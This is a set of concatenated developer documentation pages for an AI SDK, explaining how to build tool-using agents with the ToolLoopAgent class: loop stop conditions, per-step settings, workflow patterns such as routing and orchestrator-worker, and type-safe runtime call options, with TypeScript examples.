- Type safety - Get full TypeScript support for your agent's tools and outputs
The ToolLoopAgent class provides a single place to define your agent's behavior.
Creating an Agent
Define an agent by instantiating the ToolLoopAgent class with your desired configuration:
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
const myAgent = new ToolLoopAgent({
model: __MODEL__,
instructions: 'You are a helpful assistant.',
tools: {
// Your tools here
},
});
Configuration Options
The ToolLoopAgent accepts all the same settings as generateText and streamText. Configure:
Model and System Instructions
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: __MODEL__,
instructions: 'You are an expert software engineer.',
});
Tools
Provide tools that the agent can use to accomplish tasks:
import { ToolLoopAgent, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const codeAgent = new ToolLoopAgent({
model: __MODEL__,
tools: {
runCode: tool({
description: 'Execute Python code',
inputSchema: z.object({
code: z.string(),
}),
execute: async ({ code }) => {
// Execute code and return result
return { output: 'Code executed successfully' };
},
}),
},
});
Loop Control
By default, agents run for up to 20 steps (stopWhen: stepCountIs(20)). In each step, the model either generates text or calls a tool. If it generates text, the agent completes. If it calls a tool, the AI SDK executes that tool.
You can configure stopWhen differently to allow more steps. After each tool execution, the agent triggers a new generation where the model can call another tool or generate text:
import { ToolLoopAgent, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: __MODEL__,
stopWhen: stepCountIs(50), // Increase default from 20 to 50.
});
Each step represents one generation (which results in either text or a tool call). The loop continues until:
- A finish reason other than tool-calls is returned, or
- A tool that is invoked does not have an execute function, or
- A tool call needs approval, or
- A stop condition is met
You can combine multiple conditions:
import { ToolLoopAgent, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: __MODEL__,
stopWhen: [
stepCountIs(20), // Maximum 20 steps
yourCustomCondition(), // Custom logic for when to stop
],
});
Learn more about loop control and stop conditions.
Tool Choice
Control how the agent uses tools:
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: __MODEL__,
tools: {
// your tools here
},
toolChoice: 'required', // Force tool use
// or toolChoice: 'none' to disable tools
// or toolChoice: 'auto' (default) to let the model decide
});
You can also force the use of a specific tool:
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: __MODEL__,
tools: {
weather: weatherTool,
cityAttractions: attractionsTool,
},
toolChoice: {
type: 'tool',
toolName: 'weather', // Force the weather tool to be used
},
});
Structured Output
Define structured output schemas:
import { ToolLoopAgent, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const analysisAgent = new ToolLoopAgent({
model: __MODEL__,
output: Output.object({
schema: z.object({
sentiment: z.enum(['positive', 'neutral', 'negative']),
summary: z.string(),
keyPoints: z.array(z.string()),
}),
}),
});
const { output } = await analysisAgent.generate({
prompt: 'Analyze customer feedback from the last quarter',
});
Define Agent Behavior with System Instructions
System instructions define your agent's behavior, personality, and constraints. They set the context for all interactions and guide how the agent responds to user queries and uses tools.
Basic System Instructions
Set the agent's role and expertise:
const agent = new ToolLoopAgent({
model: __MODEL__,
instructions:
'You are an expert data analyst. You provide clear insights from complex data.',
});
Detailed Behavioral Instructions
Provide specific guidelines for agent behavior:
const codeReviewAgent = new ToolLoopAgent({
model: __MODEL__,
instructions: `You are a senior software engineer conducting code reviews.
Your approach:
- Focus on security vulnerabilities first
- Identify performance bottlenecks
- Suggest improvements for readability and maintainability
- Be constructive and educational in your feedback
- Always explain why something is an issue and how to fix it`,
});
Constrain Agent Behavior
Set boundaries and ensure consistent behavior:
const customerSupportAgent = new ToolLoopAgent({
model: __MODEL__,
instructions: `You are a customer support specialist for an e-commerce platform.
Rules:
- Never make promises about refunds without checking the policy
- Always be empathetic and professional
- If you don't know something, say so and offer to escalate
- Keep responses concise and actionable
- Never share internal company information`,
tools: {
checkOrderStatus,
lookupPolicy,
createTicket,
},
});
Tool Usage Instructions
Guide how the agent should use available tools:
const researchAgent = new ToolLoopAgent({
model: __MODEL__,
instructions: `You are a research assistant with access to search and document tools.
When researching:
1. Always start with a broad search to understand the topic
2. Use document analysis for detailed information
3. Cross-reference multiple sources before drawing conclusions
4. Cite your sources when presenting information
5. If information conflicts, present both viewpoints`,
tools: {
webSearch,
analyzeDocument,
extractQuotes,
},
});
Format and Style Instructions
Control the output format and communication style:
const technicalWriterAgent = new ToolLoopAgent({
model: __MODEL__,
instructions: `You are a technical documentation writer.
Writing style:
- Use clear, simple language
- Avoid jargon unless necessary
- Structure information with headers and bullet points
- Include code examples where relevant
- Write in second person ("you" instead of "the user")
Always format responses in Markdown.`,
});
Using an Agent
Once defined, you can use your agent in three ways:
Generate Text
Use generate() for one-time text generation:
const result = await myAgent.generate({
prompt: 'What is the weather like?',
});
console.log(result.text);
Stream Text
Use stream() for streaming responses:
const result = await myAgent.stream({
prompt: 'Tell me a story',
});
for await (const chunk of result.textStream) {
console.log(chunk);
}
Respond to UI Messages
Use createAgentUIStreamResponse() to create API responses for client applications:
// In your API route (e.g., app/api/chat/route.ts)
import { createAgentUIStreamResponse } from 'ai';
export async function POST(request: Request) {
const { messages } = await request.json();
return createAgentUIStreamResponse({
agent: myAgent,
uiMessages: messages,
});
}
Track Step Progress
Use onStepFinish to track each step's progress, including token usage.
The callback receives a stepNumber (zero-based) to identify which step just completed:
const result = await myAgent.generate({
prompt: 'Research and summarize the latest AI trends',
onStepFinish: async ({ stepNumber, usage, finishReason, toolCalls }) => {
console.log(`Step ${stepNumber} completed:`, {
inputTokens: usage.inputTokens,
outputTokens: usage.outputTokens,
finishReason,
toolsUsed: toolCalls?.map(tc => tc.toolName),
});
},
});
You can also define onStepFinish in the constructor for agent-wide tracking. When both constructor and method callbacks are provided, both are called (constructor first, then the method callback):
const agent = new ToolLoopAgent({
model: __MODEL__,
onStepFinish: async ({ stepNumber, usage }) => {
// Agent-wide logging
console.log(`Agent step ${stepNumber}:`, usage.totalTokens);
},
});
// Method-level callback runs after constructor callback
const result = await agent.generate({
prompt: 'Hello',
onStepFinish: async ({ stepNumber, usage }) => {
// Per-call tracking (e.g., for billing)
await trackUsage(stepNumber, usage);
},
});
End-to-end Type Safety
You can infer types for your agent's UIMessages:
import { ToolLoopAgent, InferAgentUIMessage } from 'ai';
const myAgent = new ToolLoopAgent({
// ... configuration
});
// Infer the UIMessage type for UI components or persistence
export type MyAgentUIMessage = InferAgentUIMessage<typeof myAgent>;
Use this type in your client components with useChat:
'use client';
import { useChat } from '@ai-sdk/react';
import type { MyAgentUIMessage } from '@/agent/my-agent';
export function Chat() {
const { messages } = useChat<MyAgentUIMessage>();
// Full type safety for your messages and tools
}
Next Steps
Now that you understand building agents, you can:
- Explore workflow patterns for structured patterns using core functions
- Learn about loop control for advanced execution control
- See manual loop examples for custom workflow implementations
title: Workflow Patterns description: Learn workflow patterns for building reliable agents with the AI SDK.
Workflow Patterns
Combine the building blocks from the overview with these patterns to add structure and reliability to your agents:
- Sequential Processing - Steps executed in order
- Parallel Processing - Independent tasks run simultaneously
- Evaluation/Feedback Loops - Results checked and improved iteratively
- Orchestration - Coordinating multiple components
- Routing - Directing work based on context
Choose Your Approach
Consider these key factors:
- Flexibility vs Control - How much freedom does the LLM need vs how tightly you must constrain its actions?
- Error Tolerance - What are the consequences of mistakes in your use case?
- Cost Considerations - More complex systems typically mean more LLM calls and higher costs
- Maintenance - Simpler architectures are easier to debug and modify
Start with the simplest approach that meets your needs. Add complexity only when required by:
- Breaking down tasks into clear steps
- Adding tools for specific capabilities
- Implementing feedback loops for quality control
- Introducing multiple agents for complex workflows
Let's look at examples of these patterns in action.
Patterns with Examples
These patterns, adapted from Anthropic's guide on building effective agents, serve as building blocks you can combine to create comprehensive workflows. Each pattern addresses specific aspects of task execution. Combine them thoughtfully to build reliable solutions for complex problems.
Sequential Processing (Chains)
The simplest workflow pattern executes steps in a predefined order. Each step's output becomes input for the next step, creating a clear chain of operations. Use this pattern for tasks with well-defined sequences, like content generation pipelines or data transformation processes.
import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
async function generateMarketingCopy(input: string) {
const model = __MODEL__;
// First step: Generate marketing copy
const { text: copy } = await generateText({
model,
prompt: `Write persuasive marketing copy for: ${input}. Focus on benefits and emotional appeal.`,
});
// Perform quality check on copy
const { output: qualityMetrics } = await generateText({
model,
output: Output.object({
schema: z.object({
hasCallToAction: z.boolean(),
emotionalAppeal: z.number().min(1).max(10),
clarity: z.number().min(1).max(10),
}),
}),
prompt: `Evaluate this marketing copy for:
1. Presence of call to action (true/false)
2. Emotional appeal (1-10)
3. Clarity (1-10)
Copy to evaluate: ${copy}`,
});
// If quality check fails, regenerate with more specific instructions
if (
!qualityMetrics.hasCallToAction ||
qualityMetrics.emotionalAppeal < 7 ||
qualityMetrics.clarity < 7
) {
const { text: improvedCopy } = await generateText({
model,
prompt: `Rewrite this marketing copy with:
${!qualityMetrics.hasCallToAction ? '- A clear call to action' : ''}
${qualityMetrics.emotionalAppeal < 7 ? '- Stronger emotional appeal' : ''}
${qualityMetrics.clarity < 7 ? '- Improved clarity and directness' : ''}
Original copy: ${copy}`,
});
return { copy: improvedCopy, qualityMetrics };
}
return { copy, qualityMetrics };
}
Routing
This pattern lets the model decide which path to take through a workflow based on context and intermediate results. The model acts as an intelligent router, directing the flow of execution between different branches of your workflow. Use this when handling varied inputs that require different processing approaches. In the example below, the first LLM call's results determine the second call's model size and system prompt.
import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
async function handleCustomerQuery(query: string) {
const model = __MODEL__;
// First step: Classify the query type
const { output: classification } = await generateText({
model,
output: Output.object({
schema: z.object({
reasoning: z.string(),
type: z.enum(['general', 'refund', 'technical']),
complexity: z.enum(['simple', 'complex']),
}),
}),
prompt: `Classify this customer query:
${query}
Determine:
1. Query type (general, refund, or technical)
2. Complexity (simple or complex)
3. Brief reasoning for classification`,
});
// Route based on classification
// Set model and system prompt based on query type and complexity
const { text: response } = await generateText({
model:
classification.complexity === 'simple'
? 'openai/gpt-4o-mini'
: 'openai/o4-mini',
system: {
general:
'You are an expert customer service agent handling general inquiries.',
refund:
'You are a customer service agent specializing in refund requests. Follow company policy and collect necessary information.',
technical:
'You are a technical support specialist with deep product knowledge. Focus on clear step-by-step troubleshooting.',
}[classification.type],
prompt: query,
});
return { response, classification };
}
Parallel Processing
Break down tasks into independent subtasks that execute simultaneously. This pattern uses parallel execution to improve efficiency while maintaining the benefits of structured workflows. For example, analyze multiple documents or process different aspects of a single input concurrently (like code review).
import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
// Example: Parallel code review with multiple specialized reviewers
async function parallelCodeReview(code: string) {
const model = __MODEL__;
// Run parallel reviews
const [securityReview, performanceReview, maintainabilityReview] =
await Promise.all([
generateText({
model,
system:
'You are an expert in code security. Focus on identifying security vulnerabilities, injection risks, and authentication issues.',
output: Output.object({
schema: z.object({
vulnerabilities: z.array(z.string()),
riskLevel: z.enum(['low', 'medium', 'high']),
suggestions: z.array(z.string()),
}),
}),
prompt: `Review this code:
${code}`,
}),
generateText({
model,
system:
'You are an expert in code performance. Focus on identifying performance bottlenecks, memory leaks, and optimization opportunities.',
output: Output.object({
schema: z.object({
issues: z.array(z.string()),
impact: z.enum(['low', 'medium', 'high']),
optimizations: z.array(z.string()),
}),
}),
prompt: `Review this code:
${code}`,
}),
generateText({
model,
system:
'You are an expert in code quality. Focus on code structure, readability, and adherence to best practices.',
output: Output.object({
schema: z.object({
concerns: z.array(z.string()),
qualityScore: z.number().min(1).max(10),
recommendations: z.array(z.string()),
}),
}),
prompt: `Review this code:
${code}`,
}),
]);
const reviews = [
{ ...securityReview.output, type: 'security' },
{ ...performanceReview.output, type: 'performance' },
{ ...maintainabilityReview.output, type: 'maintainability' },
];
// Aggregate results using another model instance
const { text: summary } = await generateText({
model,
system: 'You are a technical lead summarizing multiple code reviews.',
prompt: `Synthesize these code review results into a concise summary with key actions:
${JSON.stringify(reviews, null, 2)}`,
});
return { reviews, summary };
}
Orchestrator-Worker
A primary model (orchestrator) coordinates the execution of specialized workers. Each worker optimizes for a specific subtask, while the orchestrator maintains overall context and ensures coherent results. This pattern excels at complex tasks requiring different types of expertise or processing.
import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
async function implementFeature(featureRequest: string) {
// Orchestrator: Plan the implementation
const { output: implementationPlan } = await generateText({
model: __MODEL__,
output: Output.object({
schema: z.object({
files: z.array(
z.object({
purpose: z.string(),
filePath: z.string(),
changeType: z.enum(['create', 'modify', 'delete']),
}),
),
estimatedComplexity: z.enum(['low', 'medium', 'high']),
}),
}),
system:
'You are a senior software architect planning feature implementations.',
prompt: `Analyze this feature request and create an implementation plan:
${featureRequest}`,
});
// Workers: Execute the planned changes
const fileChanges = await Promise.all(
implementationPlan.files.map(async file => {
// Each worker is specialized for the type of change
const workerSystemPrompt = {
create:
'You are an expert at implementing new files following best practices and project patterns.',
modify:
'You are an expert at modifying existing code while maintaining consistency and avoiding regressions.',
delete:
'You are an expert at safely removing code while ensuring no breaking changes.',
}[file.changeType];
const { output: change } = await generateText({
model: __MODEL__,
output: Output.object({
schema: z.object({
explanation: z.string(),
code: z.string(),
}),
}),
system: workerSystemPrompt,
prompt: `Implement the changes for ${file.filePath} to support:
${file.purpose}
Consider the overall feature context:
${featureRequest}`,
});
return {
file,
implementation: change,
};
}),
);
return {
plan: implementationPlan,
changes: fileChanges,
};
}
Evaluator-Optimizer
Add quality control to workflows with dedicated evaluation steps that assess intermediate results. Based on the evaluation, the workflow proceeds, retries with adjusted parameters, or takes corrective action. This creates robust workflows capable of self-improvement and error recovery.
import { generateText, Output } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
async function translateWithFeedback(text: string, targetLanguage: string) {
let currentTranslation = '';
let iterations = 0;
const MAX_ITERATIONS = 3;
// Initial translation
const { text: translation } = await generateText({
model: __MODEL__,
system: 'You are an expert literary translator.',
prompt: `Translate this text to ${targetLanguage}, preserving tone and cultural nuances:
${text}`,
});
currentTranslation = translation;
// Evaluation-optimization loop
while (iterations < MAX_ITERATIONS) {
// Evaluate current translation
const { output: evaluation } = await generateText({
model: __MODEL__,
output: Output.object({
schema: z.object({
qualityScore: z.number().min(1).max(10),
preservesTone: z.boolean(),
preservesNuance: z.boolean(),
culturallyAccurate: z.boolean(),
specificIssues: z.array(z.string()),
improvementSuggestions: z.array(z.string()),
}),
}),
system: 'You are an expert in evaluating literary translations.',
prompt: `Evaluate this translation:
Original: ${text}
Translation: ${currentTranslation}
Consider:
1. Overall quality
2. Preservation of tone
3. Preservation of nuance
4. Cultural accuracy`,
});
// Check if quality meets threshold
if (
evaluation.qualityScore >= 8 &&
evaluation.preservesTone &&
evaluation.preservesNuance &&
evaluation.culturallyAccurate
) {
break;
}
// Generate improved translation based on feedback
const { text: improvedTranslation } = await generateText({
model: __MODEL__,
system: 'You are an expert literary translator.',
prompt: `Improve this translation based on the following feedback:
${evaluation.specificIssues.join('\n')}
${evaluation.improvementSuggestions.join('\n')}
Original: ${text}
Current Translation: ${currentTranslation}`,
});
currentTranslation = improvedTranslation;
iterations++;
}
return {
finalTranslation: currentTranslation,
iterationsRequired: iterations,
};
}
title: Loop Control description: Control agent execution with built-in loop management using stopWhen and prepareStep
Loop Control
You can control both the execution flow and the settings at each step of the agent loop. The loop continues until:
- A finish reason other than tool-calls is returned, or
- A tool that is invoked does not have an execute function, or
- A tool call needs approval, or
- A stop condition is met
The AI SDK provides built-in loop control through two parameters: stopWhen for defining stopping conditions and prepareStep for modifying settings (model, tools, messages, and more) between steps.
Stop Conditions
The stopWhen parameter determines when to stop execution after a step that contains tool results. By default, agents stop after 20 steps using stepCountIs(20). This default is a safety measure to prevent runaway loops that could result in excessive API calls and costs.
When you provide stopWhen, the agent continues executing after tool calls until a stopping condition is met. When the condition is an array, execution stops when any of the conditions are met.
Use Built-in Conditions
The AI SDK provides several built-in stopping conditions:
- stepCountIs(count): stops after a specified number of steps
- hasToolCall(toolName): stops when a specific tool is called
- isLoopFinished(): never triggers, letting the loop run until the agent is naturally finished
Run Up to a Maximum Number of Steps
import { ToolLoopAgent, stepCountIs } from 'ai';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: __MODEL__,
tools: {
// your tools
},
stopWhen: stepCountIs(50), // Increasing the default of 20 to 50.
});
const result = await agent.generate({
prompt: 'Analyze this dataset and create a summary report',
});
Run Until Finished
If you want the agent to run until the model naturally stops making tool calls, use isLoopFinished(). This removes the default step limit:
import { ToolLoopAgent, isLoopFinished } from 'ai';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: __MODEL__,
tools: {
// your tools
},
stopWhen: isLoopFinished(), // No maximum step limit.
});
const result = await agent.generate({
prompt: 'Analyze this dataset and create a summary report',
});
Combine Multiple Conditions
Combine multiple stopping conditions. The loop stops when it meets any condition:
import { ToolLoopAgent, stepCountIs, hasToolCall } from 'ai';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: __MODEL__,
tools: {
// your tools
},
stopWhen: [
stepCountIs(20), // Maximum 20 steps
hasToolCall('someTool'), // Stop after calling 'someTool'
],
});
const result = await agent.generate({
prompt: 'Research and analyze the topic',
});
Create Custom Conditions
Build custom stopping conditions for specific requirements:
import { ToolLoopAgent, StopCondition, ToolSet } from 'ai';
__PROVIDER_IMPORT__;
const tools = {
// your tools
} satisfies ToolSet;
const hasAnswer: StopCondition<typeof tools> = ({ steps }) => {
// Stop when the model generates text containing "ANSWER:"
return steps.some(step => step.text?.includes('ANSWER:') ?? false);
};
const agent = new ToolLoopAgent({
model: __MODEL__,
tools,
stopWhen: hasAnswer,
});
const result = await agent.generate({
prompt: 'Find the answer and respond with "ANSWER: [your answer]"',
});
Custom conditions receive step information across all steps:
const budgetExceeded: StopCondition<typeof tools> = ({ steps }) => {
const totalUsage = steps.reduce(
(acc, step) => ({
inputTokens: acc.inputTokens + (step.usage?.inputTokens ?? 0),
outputTokens: acc.outputTokens + (step.usage?.outputTokens ?? 0),
}),
{ inputTokens: 0, outputTokens: 0 },
);
const costEstimate =
(totalUsage.inputTokens * 0.01 + totalUsage.outputTokens * 0.03) / 1000;
return costEstimate > 0.5; // Stop if cost exceeds $0.50
};
Prepare Step
The prepareStep callback runs before each step in the loop and defaults to the initial settings if you don't return any changes. Use it to modify settings, manage context, or implement dynamic behavior based on execution history.
Dynamic Model Selection
Switch models based on step requirements:
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: 'openai/gpt-4o-mini', // Default model
tools: {
// your tools
},
prepareStep: async ({ stepNumber, messages }) => {
// Use a stronger model for complex reasoning after initial steps
if (stepNumber > 2 && messages.length > 10) {
return {
model: __MODEL__,
};
}
// Continue with default settings
return {};
},
});
const result = await agent.generate({
prompt: '...',
});
Context Management
Manage growing conversation history in long-running loops:
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: __MODEL__,
tools: {
// your tools
},
prepareStep: async ({ messages }) => {
// Keep only recent messages to stay within context limits
if (messages.length > 20) {
return {
messages: [
messages[0], // Keep system instructions
...messages.slice(-10), // Keep last 10 messages
],
};
}
return {};
},
});
const result = await agent.generate({
prompt: '...',
});
Tool Selection
Control which tools are available at each step:
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: __MODEL__,
tools: {
search: searchTool,
analyze: analyzeTool,
summarize: summarizeTool,
},
prepareStep: async ({ stepNumber, steps }) => {
// Search phase (steps 0-2)
if (stepNumber <= 2) {
return {
activeTools: ['search'],
toolChoice: 'required',
};
}
// Analysis phase (steps 3-5)
if (stepNumber <= 5) {
return {
activeTools: ['analyze'],
};
}
// Summary phase (step 6+)
return {
activeTools: ['summarize'],
toolChoice: 'required',
};
},
});
const result = await agent.generate({
prompt: '...',
});
You can also force a specific tool to be used:
prepareStep: async ({ stepNumber }) => {
if (stepNumber === 0) {
// Force the search tool to be used first
return {
toolChoice: { type: 'tool', toolName: 'search' },
};
}
if (stepNumber === 5) {
// Force the summarize tool after analysis
return {
toolChoice: { type: 'tool', toolName: 'summarize' },
};
}
return {};
};
Message Modification
Transform messages before sending them to the model:
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: __MODEL__,
tools: {
// your tools
},
prepareStep: async ({ messages, stepNumber }) => {
// Summarize tool results to reduce token usage
const processedMessages = messages.map(msg => {
if (msg.role === 'tool' && msg.content.length > 1000) {
return {
...msg,
content: summarizeToolResult(msg.content),
};
}
return msg;
});
return { messages: processedMessages };
},
});
const result = await agent.generate({
prompt: '...',
});
Access Step Information
Both stopWhen and prepareStep receive detailed information about the current execution:
prepareStep: async ({
model, // Current model configuration
stepNumber, // Current step number (0-indexed)
steps, // All previous steps with their results
messages, // Messages to be sent to the model
}) => {
// Access previous tool calls and results
const previousToolCalls = steps.flatMap(step => step.toolCalls);
const previousResults = steps.flatMap(step => step.toolResults);
// Make decisions based on execution history
if (previousToolCalls.some(call => call.toolName === 'dataAnalysis')) {
return {
toolChoice: { type: 'tool', toolName: 'reportGenerator' },
};
}
return {};
},
Forced Tool Calling
You can force the agent to always use tools by combining toolChoice: 'required' with a done tool that has no execute function. This pattern ensures the agent uses tools for every step and stops only when it explicitly signals completion.
import { ToolLoopAgent, tool } from 'ai';
import { z } from 'zod';
__PROVIDER_IMPORT__;
const agent = new ToolLoopAgent({
model: __MODEL__,
tools: {
search: searchTool,
analyze: analyzeTool,
done: tool({
description: 'Signal that you have finished your work',
inputSchema: z.object({
answer: z.string().describe('The final answer'),
}),
// No execute function - stops the agent when called
}),
},
toolChoice: 'required', // Force tool calls at every step
});
const result = await agent.generate({
prompt: 'Research and analyze this topic, then provide your answer.',
});
// extract answer from done tool call
const toolCall = result.staticToolCalls[0]; // tool call from final step
if (toolCall?.toolName === 'done') {
console.log(toolCall.input.answer);
}
Key aspects of this pattern:
- toolChoice: 'required': Forces the model to call a tool at every step instead of generating text directly. This ensures the agent follows a structured workflow.
- done tool without execute: A tool that has no execute function acts as a termination signal. When the agent calls this tool, the loop stops because there's no function to execute.
- Accessing results: The final answer is available in result.staticToolCalls, which contains tool calls that weren't executed.
This pattern is useful when you want the agent to always use specific tools for operations (like code execution or data retrieval) rather than attempting to answer directly.
Manual Loop Control
For scenarios requiring complete control over the agent loop, you can use AI SDK Core functions (generateText and streamText) to implement your own loop management instead of using stopWhen and prepareStep. This approach provides maximum flexibility for complex workflows.
Implementing a Manual Loop
Build your own agent loop when you need full control over execution:
import { generateText, ModelMessage } from 'ai';
__PROVIDER_IMPORT__;
const messages: ModelMessage[] = [{ role: 'user', content: '...' }];
let step = 0;
const maxSteps = 10;
while (step < maxSteps) {
const result = await generateText({
model: __MODEL__,
messages,
tools: {
// your tools here
},
});
messages.push(...result.response.messages);
if (result.text) {
break; // Stop when model generates text
}
step++;
}
This manual approach gives you complete control over:
- Message history management
- Step-by-step decision making
- Custom stopping conditions
- Dynamic tool and model selection
- Error handling and recovery
Learn more about manual agent loops in the cookbook.
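As an illustration, the following sketch layers simple error handling and a custom stop marker onto the loop above (the single-retry policy and the DONE marker are assumptions for demonstration, not a prescribed pattern):
import { generateText, ModelMessage } from 'ai';
__PROVIDER_IMPORT__;
const messages: ModelMessage[] = [{ role: 'user', content: '...' }];
let retries = 0;
for (let step = 0; step < 10; step++) {
  try {
    const result = await generateText({
      model: __MODEL__,
      messages,
      tools: {
        // your tools here
      },
    });
    messages.push(...result.response.messages);
    // Custom stopping condition: stop once the model emits a marker.
    if (result.text.includes('DONE')) {
      break;
    }
  } catch (error) {
    // Simple recovery: retry the step once, then rethrow.
    if (retries++ >= 1) {
      throw error;
    }
  }
}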
title: Configuring Call Options description: Pass type-safe runtime inputs to dynamically configure agent behavior.
Configuring Call Options
Call options allow you to pass type-safe structured inputs to your agent. Use them to dynamically modify any agent setting based on the specific request.
Why Use Call Options?
When you need agent behavior to change based on runtime context:
- Add dynamic context - Inject retrieved documents, user preferences, or session data into prompts
- Select models dynamically - Choose faster or more capable models based on request complexity
- Configure tools per request - Pass user location to search tools or adjust tool behavior
- Customize provider options - Set reasoning effort, temperature, or other provider-specific settings
Without call options, you'd need to create multiple agents or handle configuration logic outside the agent.
How It Works
Define call options in three steps:
- Define the schema: specify what inputs you accept using callOptionsSchema
- Configure with prepareCall: use those inputs to modify agent settings
- Pass options at runtime: provide the options when calling generate() or stream()
Basic Example
Add user context to your agent's prompt at runtime:
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const supportAgent = new ToolLoopAgent({
model: __MODEL__,
callOptionsSchema: z.object({
userId: z.string(),
accountType: z.enum(['free', 'pro', 'enterprise']),
}),
instructions: 'You are a helpful customer support agent.',
prepareCall: ({ options, ...settings }) => ({
...settings,
instructions:
settings.instructions +
`\nUser context:
- Account type: ${options.accountType}
- User ID: ${options.userId}
Adjust your response based on the user's account level.`,
}),
});
// Call the agent with specific user context
const result = await supportAgent.generate({
prompt: 'How do I upgrade my account?',
options: {
userId: 'user_123',
accountType: 'free',
},
});
The options parameter is required and type-checked: if you omit it or pass incorrect types, TypeScript reports an error.
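For instance, both of these calls are rejected at compile time (a minimal illustration; the error descriptions in the comments are paraphrased):
// Type error: 'options' is missing (required by callOptionsSchema)
await supportAgent.generate({ prompt: 'How do I upgrade my account?' });
// Type error: 'premium' is not assignable to 'free' | 'pro' | 'enterprise'
await supportAgent.generate({
  prompt: 'How do I upgrade my account?',
  options: { userId: 'user_123', accountType: 'premium' },
});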
Modifying Agent Settings
Use prepareCall to modify any agent setting. Return only the settings you want to change.
Dynamic Model Selection
Choose models based on request characteristics:
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const agent = new ToolLoopAgent({
model: __MODEL__, // Default model
callOptionsSchema: z.object({
complexity: z.enum(['simple', 'complex']),
}),
prepareCall: ({ options, ...settings }) => ({
...settings,
model:
options.complexity === 'simple' ? 'openai/gpt-4o-mini' : 'openai/o1-mini',
}),
});
// Use faster model for simple queries
await agent.generate({
prompt: 'What is 2+2?',
options: { complexity: 'simple' },
});
// Use more capable model for complex reasoning
await agent.generate({
prompt: 'Explain quantum entanglement',
options: { complexity: 'complex' },
});
Dynamic Tool Configuration
Configure tools based on runtime context:
import { openai } from '@ai-sdk/openai';
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const newsAgent = new ToolLoopAgent({
model: __MODEL__,
callOptionsSchema: z.object({
userCity: z.string().optional(),
userRegion: z.string().optional(),
}),
tools: {
web_search: openai.tools.webSearch(),
},
prepareCall: ({ options, ...settings }) => ({
...settings,
tools: {
web_search: openai.tools.webSearch({
searchContextSize: 'low',
userLocation: {
type: 'approximate',
city: options.userCity,
region: options.userRegion,
country: 'US',
},
}),
},
}),
});
await newsAgent.generate({
prompt: 'What are the top local news stories?',
options: {
userCity: 'San Francisco',
userRegion: 'California',
},
});
Provider-Specific Options
Configure provider settings dynamically:
import { OpenAILanguageModelResponsesOptions } from '@ai-sdk/openai';
import { ToolLoopAgent } from 'ai';
import { z } from 'zod';
const agent = new ToolLoopAgent({
model: 'openai/o3',
callOptionsSchema: z.object({
taskDifficulty: z.enum(['low', 'medium', 'high']),
}),
prepareCall: ({ options, ...settings }) => ({
...settings,
providerOptions: {
openai: {
reasoningEffort: options.taskDifficulty,
} satisfies OpenAILanguageModelResponsesOptions,
},
}),
});
await agent.generate({
prompt: 'Analyze this complex scenario...',
options: { taskDifficulty: 'high' },
});
Advanced Patterns
Retrieval Augmented Generation (RAG)
Fetch relevant context and inject it into your prompt:
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const ragAgent = new ToolLoopAgent({
model: __MODEL__,
callOptionsSchema: z.object({
query: z.string(),
}),
prepareCall: async ({ options, ...settings }) => {
// Fetch relevant documents (this can be async)
const documents = await vectorSearch(options.query);
return {
...settings,
instructions: `Answer questions using the following context:
${documents.map(doc => doc.content).join('\n\n')}`,
};
},
});
await ragAgent.generate({
prompt: 'What is our refund policy?',
options: { query: 'refund policy' },
});
The prepareCall function can be async, enabling you to fetch data before configuring the agent.
Combining Multiple Modifications
Modify multiple settings together:
import { ToolLoopAgent } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const agent = new ToolLoopAgent({
model: __MODEL__,
callOptionsSchema: z.object({
userRole: z.enum(['admin', 'user']),
urgency: z.enum(['low', 'high']),
}),
tools: {
readDatabase: readDatabaseTool,
writeDatabase: writeDatabaseTool,
},
prepareCall: ({ options, ...settings }) => ({
...settings,
// Upgrade model for urgent requests
model: options.urgency === 'high' ? __MODEL__ : settings.model,
// Limit tools based on user role
activeTools:
options.userRole === 'admin'
? ['readDatabase', 'writeDatabase']
: ['readDatabase'],
// Adjust instructions
instructions: `You are a ${options.userRole} assistant.
${options.userRole === 'admin' ? 'You have full database access.' : 'You have read-only access.'}`,
}),
});
await agent.generate({
prompt: 'Update the user record',
options: {
userRole: 'admin',
urgency: 'high',
},
});
Using with createAgentUIStreamResponse
Pass call options through API routes to your agent:
import { createAgentUIStreamResponse } from 'ai';
import { myAgent } from '@/ai/agents/my-agent';
export async function POST(request: Request) {
const { messages, userId, accountType } = await request.json();
return createAgentUIStreamResponse({
agent: myAgent,
messages,
options: {
userId,
accountType,
},
});
}
Next Steps
- Learn about loop control for execution management
- Explore workflow patterns for complex multi-step processes
